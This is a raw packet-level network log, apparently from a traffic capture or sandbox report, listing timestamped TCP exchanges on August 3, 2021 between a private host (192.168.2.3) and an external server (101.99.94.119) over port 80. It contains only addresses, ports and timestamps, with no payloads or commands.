Aug 3, 2021 19:01:31.546628952 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.591965914 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592009068 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592027903 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592047930 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592072010 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592093945 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592122078 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592144966 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592169046 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592191935 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592216015 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592238903 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592262983 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592286110 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592313051 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592336893 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592360020 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.592447042 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.638211966 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638253927 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638273001 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638297081 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638530970 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.638550997 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638586998 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638612032 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638636112 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638660908 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638685942 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638709068 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638731956 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638755083 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638871908 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638875008 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.638909101 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.638909101 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638940096 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638964891 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638988972 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.639013052 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.639038086 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.639062881 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.639086008 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.639110088 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.639137983 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.639158010 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.639190912 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.639234066 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.685801029 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685841084 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685864925 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685889006 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685905933 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685926914 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685945034 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685967922 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685991049 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686012983 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686033964 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686055899 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686077118 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686098099 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686120987 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686148882 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686173916 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686194897 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686219931 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686240911 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686263084 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686285019 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686307907 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686336040 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686362028 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686382055 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686398029 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686414957 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686430931 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686446905 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686466932 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686491013 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686513901 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686534882 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686557055 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686587095 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686610937 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686631918 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686650038 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686670065 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686693907 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686714888 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686737061 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686758995 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686825991 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686853886 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686856031 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686857939 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686860085 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686862946 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686866045 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686867952 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686870098 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686871052 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686872959 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686873913 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686876059 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686877012 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686880112 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686881065 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686882973 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686885118 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686887980 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686888933 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686891079 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686892986 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686893940 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686896086 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686897993 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686898947 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686902046 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686904907 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686908007 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686911106 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686913967 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686916113 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686918974 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686922073 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686924934 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.686928034 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.732275963 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732323885 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732348919 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732372046 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732398033 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732422113 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732444048 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732465982 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732490063 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732513905 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732532024 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732548952 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732564926 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732589006 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732611895 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732640982 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732661009 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732681990 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732702971 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732723951 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732745886 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732767105 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732791901 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732815981 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732837915 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732836008 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.732861996 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732884884 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732908964 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732930899 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732954025 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.732980013 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733002901 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733025074 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733047962 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733072042 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733093023 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733114004 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733134985 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733160019 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733170033 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.733186007 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733207941 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733232975 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733256102 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733277082 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733292103 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.733299971 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733335972 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733340025 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.733361959 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733386040 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733388901 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.733407021 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733428955 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.733500004 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779304981 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779344082 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779369116 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779392958 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779407978 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779416084 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779428959 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779439926 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779464006 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779484987 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779491901 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779512882 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779517889 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779547930 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779552937 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779572010 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779580116 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779594898 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779607058 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779611111 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779758930 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779783010 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779803991 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779808998 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779812098 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779840946 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779841900 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779860020 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779865980 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779881954 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779891014 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779905081 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779916048 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779927969 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779942989 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779957056 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779968023 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.779987097 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.779988050 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780008078 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780009031 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780028105 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780033112 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780047894 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780059099 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780069113 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780080080 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780092955 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780105114 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780118942 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780144930 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780145884 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780169964 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780174971 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780193090 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780198097 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780216932 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780220032 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780240059 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780244112 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780266047 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780267954 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780291080 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780292988 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780314922 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780318022 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780339003 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780343056 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780365944 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780368090 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780392885 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780392885 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780412912 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780417919 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780437946 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780441046 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780464888 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780466080 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780488014 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780489922 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780508995 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780519009 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780544043 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780544043 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780566931 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780569077 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780590057 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780591965 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780611038 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780616999 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780637980 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780639887 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.780667067 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.780683994 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.826695919 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.826733112 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.826751947 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.826772928 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.826793909 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.826814890 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.826836109 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.826858997 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.826883078 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.826926947 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.826958895 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827035904 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827061892 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827080011 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827099085 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827147007 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827171087 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827194929 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827218056 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827239990 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827264071 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827286959 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827301979 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827311039 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827320099 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827323914 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827326059 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827336073 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827342987 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827358961 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827379942 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827382088 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827405930 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827406883 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827429056 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827442884 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827452898 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827472925 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827476978 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827502966 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827506065 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827527046 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827547073 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827548981 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827572107 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827594995 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827617884 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827632904 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827641010 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827644110 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827665091 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827689886 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.827692986 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.827717066 CEST	49736	80	192.168.2.3	101.99.94.119
